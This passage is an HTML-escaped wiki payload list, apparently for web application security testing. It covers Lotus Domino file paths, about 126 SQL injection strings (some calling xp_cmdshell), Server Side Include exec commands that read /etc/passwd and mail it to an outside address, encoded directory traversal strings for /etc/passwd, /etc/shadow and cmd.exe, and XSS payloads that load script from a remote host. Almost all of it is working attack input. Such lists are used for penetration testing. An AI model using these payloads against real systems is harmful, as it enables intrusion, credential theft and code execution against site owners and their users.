/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
